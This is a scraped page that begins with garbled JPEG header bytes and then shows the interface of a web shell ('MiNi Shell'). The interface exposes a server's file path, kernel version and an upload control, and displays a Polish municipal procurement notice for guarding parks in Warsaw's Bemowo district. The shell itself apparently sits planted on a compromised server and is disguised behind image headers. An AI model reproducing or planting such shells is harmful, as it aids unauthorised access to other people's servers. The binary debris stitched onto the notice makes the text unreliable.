JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220302/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220302/0007340501-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Ochrona fizyczna obiektów rekreacyjnych w parku Górczewska oraz przy ul. Obrońców Tobruku w dzielnicy Bemowo m.st. Warszawy </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">MIASTO STOŁECZNE WARSZAWA Dzielnica Bemowo</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 015259640</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Powstańców Śląskich 70</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">01-381</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">bemowo.wzp@um.warszawa.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bemowo.waw.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Ochrona fizyczna obiektów rekreacyjnych w parku Górczewska oraz przy ul. Obrońców Tobruku w dzielnicy Bemowo m.st. Warszawy </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-3949a332-9a24-11ec-baa2-b6d934483bfb</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00073405</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-03-02</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00018351/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.11 Ochrona placów zabaw w latach 2022-2023</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zamowienia.um.warszawa.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://zamowienia.um.warszawa.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Stały dostęp do sieci Internet o<br/>gwarantowanej przepustowości nie mniejszej niż 512 kb/s na komputer;<br/>• komputer PC/MAC z aktualnym systemem operacyjnym wspieranym przez producenta;<br/>• Zainstalowana przeglądarka wspierana przez producenta: MS Internet Explorer, Firefox, Google Chrome lub MS Edge;<br/>• Zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf;<br/>• Wielkość pojedynczego pliku zamieszczanego w systemie nieprzekraczająca 100 MB;<br/>• Dopuszczalne formaty plików: txt, rtf, pdf ,xps, odt, ods, odp, doc, xls, ppt, docx, xlsx, pptx, csv, jpg, jpeg, tif, tiff, geotiff, png, svg,<br/>wav, mp3, avi, mpg, mpeg, mp4, m4a, mpeg4, ogg, ogv, zip, tar, gz, gzip, 7z, html, xhtml, css, xml, xsd, gml, rng, xsl, xslt, TSL,<br/>XMLsig, XAdES, CAdES, ASIC, XMLenc<br/>• Plik załączony i zapisany przez Wykonawcę, widoczny jest w Systemie, jako zaszyfrowany – format kodowania UTF8. Możliwość<br/>otworzenia pliku dostępna jest dopiero po odszyfrowaniu przez Zamawiającego po upływie terminu składania ofert;<br/>• Oznaczenie czasu odbioru danych przez Platformę stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego<br/>serwera synchronizowanego odpowiednim źródłem czasu - zegarem Głównego Urzędu Miar<br/>1. W przypadku składania wniosku lub oferty w formie elektronicznej (podpisywania dokumentów kwalifikowanym podpisem<br/>elektronicznym), Wykonawca musi posiadać:<br/>• Kwalifikowany podpis elektroniczny osoby składającej wniosek lub ofertę w Systemie;<br/>• Włączona w przeglądarce obsługa JavaScript;<br/>• Zainstalowane na komputerze środowisko uruchomieniowe ORACLE JAVA (dla systemu Windows - w wersji 32 oraz 64 bitowej –<br/>do pobrania ze strony producenta w sekcji Java SE Runtime Environment 8u202 - Windows x86 Offline oraz Windowsx64, dla<br/>systemu Mac - do pobrania ze strony producenta w sekcji Java SE Development Kit 8u202 - Mac OS X x64; alternatywnie do<br/>oprogramowania ORACLE - JAVA w wersji OpenJDK)<br/>• Zainstalowana aplikacja Szafir Host<br/>• Podłączony lub wbudowany w komputer czytnik kart podpisu elektronicznego.<br/>Prawidłowość zainstalowania w/w komponentów można zweryfikować po zalogowaniu do OnePlace, po kliknięciu przycisku<br/>„SPRAWDŹ PODPIS”<br/>2. W przypadku składania wniosku lub oferty w postaci elektronicznej (podpisywania dokumentów podpisem osobistym),<br/>Wykonawca musi posiadać (dotyczy postępowań o wartości mniejszej niż progi unijne):<br/>• E-dowód osobisty osoby składającej wniosek lub ofertę w Systemie;<br/>• Włączona w przeglądarce opcja obsługi JavaScript;<br/>• Zainstalowane na komputerze środowisko uruchomieniowe ORACLE JAVA (dla systemu Windows - w wersji 32 oraz 64 bitowej –<br/>do pobrania ze strony producenta w sekcji Java SE Runtime Environment 8u202 - Windows x86 Offline oraz Windowsx64, dla<br/>systemu Mac - do pobrania ze strony producenta w sekcji Java SE Development Kit 8u202 - Mac OS X x64; alternatywnie do<br/>oprogramowania ORACLE - JAVA w wersji OpenJDK)<br/>• Zainstalowana aplikacja Szafir Host;<br/>• Zainstalowane oprogramowanie do obsługi e-dowodu E-dowód menadżer dostępne na stronie https://www.gov.pl/web/e-dowod;<br/>• Podłączony lub wbudowany w komputer czytnik karty e-dowód.<br/>Prawidłowość zainstalowania w/w komponentów można zweryfikować po zalogowaniu do OnePlace, po kliknięciu przycisku<br/>„SPRAWDŹ PODPIS”.<br/>3. W przypadku składania wniosku lub oferty w postaci elektronicznej (podpisywania dokumentów profilem zaufanym), Wykonawca<br/>musi posiadać (dotyczy postępowań o wartości mniejszej niż progi unijne):<br/>• Profil zaufany osoby składającej wniosek lub ofertę w Systemie.<br/>Pozostałe wymagania zawarte są w Rozdziale IX ust. 3 pkt 2 SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Będziemy przetwarzać Pani/Pana dane osobowe, by mogła/mógł Pani/Pan załatwić<br/>sprawę w Urzędzie m.st. Warszawy. Mogą być przetwarzane w sposób zautomatyzowany, ale nie będą profilowane.<br/>Kto administruje moimi danymi?<br/>1. Administratorem Pani/Pana danych osobowych przetwarzanych w Urzędzie m.st. Warszawy jest Prezydent m.st. Warszawy, z<br/>siedzibą w Warszawie (00-950), Pl. Bankowy 3/5.<br/>2. Na pytania dotyczące sposobu i zakresu przetwarzania Pani/Pana danych, a także o przysługujące Pani/Panu prawa odpowie<br/>Inspektor Ochrony Danych w Urzędzie<br/>m.st. Warszawy. Proszę je wysłać na adres: iod@um.warszawa.pl.<br/>Dlaczego moje dane są przetwarzane?<br/>• Wynika to bezpośrednio z konkretnego przepisu prawa, tj. ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych oraz aktów wykonawczych do niej wydanych; ustawy z dnia 10 maja 2018 r. o ochronie danych osobowych, Rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/678 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem<br/>danych osobowych i w sprawie swobodnego przepływu tych danych, ustawy z dnia 27 sierpnia 2009 r. o finansach publicznych,<br/>ustawy z dnia 6 września 2001 r. o dostępie do informacji publicznej, ustawy z dnia 14 lipca 1983 r. o narodowym zasobie<br/>archiwalnym i archiwach lub jest niezbędne do wykonania zadania w interesie publicznym albo w ramach sprawowania władzy<br/>publicznej.<br/>• Pani/Pana dane osobowe przetwarzane są w celu/celach: ubiegania się o udzielenie zamówienia publicznego.<br/>• Podanie przez Panią/Pana danych osobowych jest obowiązkowe. Jeśli Pani/Pan tego nie zrobi, nie będziemy mogli zrealizować<br/>Pana/Pani sprawy .<br/>Jak długo będą przechowywane moje dane?<br/>1. Pani/Pana dane osobowe będą przechowywane przez czas wymagany przepisami prawa, tj. przez okres wynikający z przepisów<br/>ustawy Prawo zamówień publicznych, tj. okres niezbędny do realizacji celu/celów określonych powyżej, a po tym czasie przez okres<br/>oraz w zakresie wymaganym przez przepisy powszechnie obowiązującego prawa.<br/>Potem, zgodnie z przepisami, dokumenty trafią do archiwum zakładowego.<br/>Kto może mieć dostęp do moich danych?<br/>Odbiorcami Pani/Pana danych osobowych mogą być:<br/>a) podmioty, którym Administrator powierzy przetwarzanie danych osobowych w szczególności:<br/>• podmioty świadczące na rzecz Urzędu m.st. Warszawy usługi informatyczne, pocztowe;<br/>• każdy zainteresowany odbiorca - informacje o Wykonawcach, którzy uczestniczyli w postępowaniu o udzielenie zamówienia<br/>publicznego są jawne na podstawie ustawy oraz ustawy o dostępie do informacji publicznej.<br/>• podmioty upoważnione na podstawie przepisów prawa;<br/>b) organy publiczne i inne podmioty, którym Administrator udostępni dane osobowe na podstawie przepisów prawa;<br/>Jakie mam prawa w związku z przetwarzaniem moich danych?<br/>3. Ma Pani/Pan prawo do:<br/>1. dostępu do danych osobowych, w tym uzyskania kopii tych danych;<br/>2. żądania sprostowania (poprawienia) danych osobowych;<br/>3. żądania usunięcia danych osobowych (tzw. prawo do bycia zapomnianym), w przypadku gdy:<br/>• dane nie są już niezbędne do celów, dla których były zebrane lub w inny sposób przetwarzane;<br/>• nie ma podstawy prawnej do przetwarzania Pani/Pana danych osobowych;<br/>• wniosła Pani/Pan sprzeciw wobec przetwarzania i nie występują nadrzędne prawnie uzasadnione podstawy przetwarzania;<br/>• Pani/Pana dane przetwarzane są niezgodnie z prawem;<br/>• Pani/Pana dane muszą być usunięte, by wywiązać się z obowiązku wynikającego z przepisów prawa.<br/>4. żądania ograniczenia przetwarzania danych osobowych;<br/>Ciąg dalszy klauzuli informacyjnej o przetwarzaniu danych osobowych zawarty jest w Rozdziale XXIII<br/>SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">UD-I-WZP.271.4.2022.MLA</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.5.) Łączna wartość poszczególnych części zamówienia: <span class="normal"> 1478040,65 PLN </span> </h3> <h3 class="mb-0">4.1.6.) Wartość zamówienia stanowiącego przedmiot tego postępowania (bez VAT): <span class="normal"> 765040,65 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest realizacja usług polegających na ochronie fizycznej mienia znajdującego się na terenie<br/>obiektów rekreacyjnych umiejscowionych w Parku Górczewska oraz przy ul. Obrońców Tobruku w Dzielnicy Bemowo m.st.<br/>Warszawy.<br/>2. W realizacji zamówienia Wykonawca zobowiązuje się także do utrzymania w czystości i właściwego stanu technicznego<br/>toalet przeznaczonych dla ich użytkowników. Jedna z toalet - wolnostojąca znajduje się na terenie placu zabaw przy ul.<br/>Obrońców Tobruku, druga ogólnodostępna toaleta znajduje się w budynku Amfiteatru zlokalizowanego w Parku<br/>Górczewska.<br/>3. Szczegółowy opis przedmiotu zamówienia oraz warunki realizacji zamówienia znajdują się w Opisie przedmiotu<br/>zamówienia oraz w Projektowanych postanowieniach umowy stanowiących załączniki do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79710000-4 - Usługi ochroniarskie</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-08-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający<br/>przewiduje udzielenie zamówień, o których mowa w art. 214 ust. 1 pkt 7 ustawy do kwoty: 123 000,00 zł brutto (100 000,00 zł netto)<br/>polegających na wykonaniu czynności w zakresie ochrony fizycznej mienia znajdującego się na terenie obiektów rekreacyjnych<br/>umiejscowionych w Parku Górczewska oraz przy ul. Obrońców Tobruku w Dzielnicy Bemowo m.st. Warszawy. Zamówienie<br/>polegające na powtórzeniu ww. usług może zostać udzielone, gdy zajdzie taka konieczność, a Zamawiający będzie dysponował<br/>odpowiednimi środkami finansowymi.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie oceniał oferty niepodlegające odrzuceniu<br/>na podstawie kryteriów, przypisując im wagę procentową.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas dojazdu ekipy interwencyjnej na teren obiektu po otrzymaniu informacji o konieczności podjęcia działań zmierzających do usunięcia zagrożenia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Zatrudnienie przez Wykonawcę do realizacji zamówienia osób do 30 roku życia oraz po ukończeniu 50 roku życia, posiadających status osób poszukujących pracy, bez zatrudnienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty społeczne</p> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej:<br/>Wykonawca spełni warunek jeżeli wykaże, że posiada uprawnienia do wykonywania określonej działalności lub czynności,<br/>jeżeli przepisy prawa nakładają obowiązek posiadania takich uprawnień, tj.: posiada aktualną koncesję na prowadzenie<br/>działalności gospodarczej w zakresie usług ochrony osób i mienia w formie bezpośredniej ochrony fizycznej stałej lub<br/>doraźnej, wydanej przez Ministra Spraw Wewnętrznych i Administracji na podstawie ustawy z dnia 22 sierpnia 1997 r. o<br/>ochronie osób i mienia (t.j. Dz. U z 2021 r. poz. 1995 z późn. zm.);<br/>W przypadku Wykonawców wspólnie ubiegających się o zamówienie publiczne, koncesję przedkłada Wykonawca, który<br/>będzie bezpośrednio uczestniczył w wykonywaniu usług objętych koncesją.<br/>3) sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>4) zdolności technicznej lub zawodowej:<br/>a) Wykonawca spełni warunek jeżeli wykaże, że w okresie ostatnich trzech lat, a jeżeli okres prowadzenia działalności jest<br/>krótszy – w tym okresie, należycie wykonał minimum jedną usługę, o wartości minimum 200.000,00 zł brutto, polegającą na<br/>bezpośredniej ochronie fizycznej mienia na terenie o powierzchni nie mniejszej niż 15 000 m2.<br/>Zamawiający przez jedną usługę rozumie zamówienie wykonane w ramach jednej umowy trwającej nieprzerwanie przez<br/>okres 12 miesięcy.<br/>W przypadku usług nadal wykonywanych Zamawiający uzna usługi już zrealizowane odpowiadające wartości i rodzajowi<br/>usług, wskazanych w wyżej wymienionym warunku;<br/>b) Wykonawca spełni warunek jeżeli wykaże, że dysponuje co najmniej czterema pracownikami, którzy będą świadczyli<br/>usługi ochrony mienia obiektów rekreacyjnych, posiadającymi ważne legitymacje kwalifikowanych pracowników ochrony<br/>fizycznej z art. 26 i art. 27 ustawy z dnia z dnia 22 sierpnia 1997 r. o ochronie osób i mienia (tj. Dz. U z 2021 poz. 1995 z<br/>późn. zm.);<br/>- Zamawiający, w stosunku do Wykonawców wspólnie ubiegających się o udzielenie zamówienia, w odniesieniu do warunku<br/>dotyczącego zdolności technicznej lub zawodowej, określonego w pkt 4 lit. a) uzna jeżeli co najmniej jeden z Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia spełni warunek, w przypadku warunku określonego w pkt 4 lit. b)<br/>warunek Wykonawcy mogą spełnić łącznie. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">3) W celu potwierdzenia<br/>braku podstaw wykluczenia Wykonawcy z udziału w postępowaniu, Zamawiający żąda następujących podmiotowych środków<br/>dowodowych:<br/>a) oświadczenia Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp, w<br/>zakresie podstaw wykluczenia z postępowania określonych w przepisach art. 108 ust. 1 ustawy Pzp.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">4.<br/>Dokumenty składane w wyznaczonym, nie krótszym niż 5 dni, terminie potwierdzające spełnianie warunków udziału w postępowaniu<br/>i braku podstaw do wykluczenia z postępowania:<br/>1) W celu potwierdzenia spełniania przez Wykonawcę warunku udziału w postępowaniu dotyczącego uprawnień do prowadzenia<br/>określonej działalności gospodarczej lub zawodowej określonego w SWZ, Zamawiający żąda następujących podmiotowych środków<br/>dowodowych:<br/>a) aktualnej koncesji na prowadzenie działalności gospodarczej w zakresie ochrony osób i mienia w formie bezpośredniej ochrony<br/>fizycznej stałej lub doraźnej wydaną przez Ministra Spraw Wewnętrznych i Administracji na podstawie ustawy z dnia 22 sierpnia<br/>1997 r. o ochronie osób i mienia (t.j. Dz. U z 2021 r. poz. 1995 z późn. zm.) przy czym okres ważności koncesji nie może być krótszy<br/>niż okres realizacji przedmiotowego zamówienia;<br/>w przypadku gdy, Wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej, zamawiający<br/>wymaga odpowiedniego zezwolenia, licencji, koncesji lub wpisu do rejestru działalności regulowanej, jeżeli ich posiadanie jest<br/>niezbędne do świadczenia określonych usług w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania;<br/>2) W celu potwierdzenia spełniania przez Wykonawcę warunku udziału w postępowaniu dotyczącego zdolności technicznej lub<br/>zawodowej Zamawiający żąda następujących 